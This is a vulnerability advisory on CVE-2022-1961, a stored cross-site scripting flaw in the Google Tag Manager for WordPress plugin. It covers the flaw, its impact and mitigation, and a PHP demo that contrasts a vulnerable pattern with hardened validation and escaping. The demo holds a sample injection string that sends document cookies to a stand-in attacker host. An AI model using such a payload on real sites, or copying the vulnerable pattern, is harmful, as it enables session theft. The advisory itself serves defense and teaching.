CVE-2022-1961 in Google Tag Manager Plugin

Summary

by MITRE • 06/13/2022

The Google Tag Manager for WordPress (GTM4WP) plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping via the `gtm4wp-options[scroller-contentid]` parameter found in the `~/public/frontend.php` file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.15.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.


Analysis

by VulDB Data Team • 04/08/2026

CVE-2022-1961 affects the Google Tag Manager for WordPress (GTM4WP) plugin in versions up to and including 1.15.1. The flaw is a stored cross-site scripting issue in `frontend.php`: the value of the `gtm4wp-options[scroller-contentid]` setting, the id of the element the plugin's scroll-tracking script watches, is written into page output without adequate escaping. Because the setting is stored with the plugin's options and rendered on the public front end, a user with administrative privileges can save script content once and have it execute in the browser of every visitor who loads an affected page, including other administrators and, on a multisite network, the super admin. The severity is moderate rather than critical: exploitation requires an existing administrator account, and the flaw only matters where that account is otherwise prevented from publishing raw HTML.

Technically, the problem is missing output escaping combined with missing input validation in the plugin's settings handling. When an administrator saves the plugin settings, the `scroller-contentid` value is stored as entered and later concatenated into the inline JavaScript that `frontend.php` emits on the front end, so a value containing a quote character followed by a script fragment breaks out of the intended string literal. The result is a persistent XSS vector: the payload sits in the database and runs on every page load until the option is cleaned. The unfiltered_html detail in the summary decides whether this is a vulnerability at all. On a default single-site installation administrators hold the `unfiltered_html` capability and can already publish arbitrary HTML and script, so the plugin grants them nothing new. On multisite installations, where only super admins hold that capability, and on sites that revoke it (for example with `DISALLOW_UNFILTERED_HTML`), the flaw bypasses a restriction the site operator deliberately imposed, which is why the advisory scopes the impact to those configurations.
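As an added illustration, not GTM4WP's own code and not the fix the project shipped, the following stand-alone PHP script reproduces the pattern described above: a setting value concatenated into an inline script, followed by the two independent fixes a hardened plugin would apply (validate on save, escape on output). The option value is a constructed sample, the JavaScript variable name is an assumption, and `json_encode()` with the `JSON_HEX_*` flags stands in for WordPress's `esc_js()`, which is not available outside WordPress.

```php
<?php
// Added example (not the plugin's code): an admin-supplied element id rendered
// into an inline <script>, shown unescaped and then hardened two ways.
declare(strict_types=1);

// Constructed sample: what a restricted administrator (no unfiltered_html) could
// type into the "content element id" setting. The double quote closes the JS
// string literal; everything after it runs on every front-end page load.
$stored_option = 'article"; fetch("https://attacker.example/c?" + document.cookie); //';

// Vulnerable pattern: the stored value is concatenated straight into a JS string.
// The variable name is an assumption for the example.
function render_scroller_script_vulnerable(string $content_id): string
{
    return '<script>var gtm4wp_scrollerscript_contentelementid = "'
        . $content_id . '";</script>';
}

// Fix 1, at storage time: an HTML element id is a constrained value, so reject
// anything outside a tight allow-list instead of trying to clean it. The pattern
// below is stricter than HTML5 permits, which is acceptable for a tracking setting.
function sanitize_content_id(string $raw): string
{
    $raw = trim($raw);
    if ($raw === '' || !preg_match('/\A[A-Za-z][A-Za-z0-9_:.-]{0,127}\z/', $raw)) {
        return ''; // invalid: store an empty id, which simply disables the feature
    }
    return $raw;
}

// Fix 2, at output time: escape regardless of what is in the database.
// json_encode with the HEX flags yields a JS string literal that cannot break out
// of its quotes (" -> \u0022) or close the surrounding element (< -> \u003C).
// Inside WordPress the same job is done by esc_js().
function render_scroller_script_hardened(string $content_id): string
{
    $literal = json_encode(
        $content_id,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return '<script>var gtm4wp_scrollerscript_contentelementid = '
        . $literal . ';</script>';
}

echo 'vulnerable: ', render_scroller_script_vulnerable($stored_option), PHP_EOL;
echo 'validated : ', var_export(sanitize_content_id($stored_option), true), PHP_EOL;
echo 'escaped   : ', render_scroller_script_hardened($stored_option), PHP_EOL;
```

Run with `php example.php`. The first line shows the payload intact inside the `<script>` element; the second shows the allow-list rejecting it outright (returning an empty string); the third shows the same payload rendered as an inert string literal. Both fixes belong in a real plugin: validation keeps junk out of the database, output escaping protects against values that were stored before the validation existed.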

The impact is that of any stored XSS running with the victim's browser session: session hijacking, credential theft, forged requests to the WordPress admin with the victim's privileges, and exfiltration of page content. Because the payload is stored, it affects every user who loads the affected page until the option is cleaned from the database. On a multisite network this matters most: a site administrator who is deliberately denied `unfiltered_html` can plant script that runs in the super admin's browser, and from there reach the rest of the network. The prerequisite of an administrator account is a high bar, so the flaw is not an entry point from outside; it is a way for a constrained or already compromised administrator to exceed the limits the site operator set.

Mitigation starts with updating the plugin to a release that validates the `scroller-contentid` setting on save and escapes it on output. After updating, inspect the stored option for an existing payload, since an update may not clean values saved earlier; an element id should contain nothing but letters, digits and a few punctuation characters, so any `<`, `"` or `;` in it is a sign of tampering. Operators should also log changes to plugin options and review them during routine audits, and restrict administrator accounts, enforce strong authentication on them, and keep `unfiltered_html` revoked where it is not needed, so that the prerequisite account is harder for an attacker to obtain. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The same rule applies to every user-controllable setting a plugin renders: validate against the narrowest form the value can legitimately take, and escape for the exact context (HTML attribute, HTML body, JavaScript string) in which it is emitted.

Responsible

Wordfence

Reservation

05/31/2022

Disclosure

06/13/2022

Moderation

accepted

CPE

ready

EPSS

0.01046

KEV

no

Activities

very low
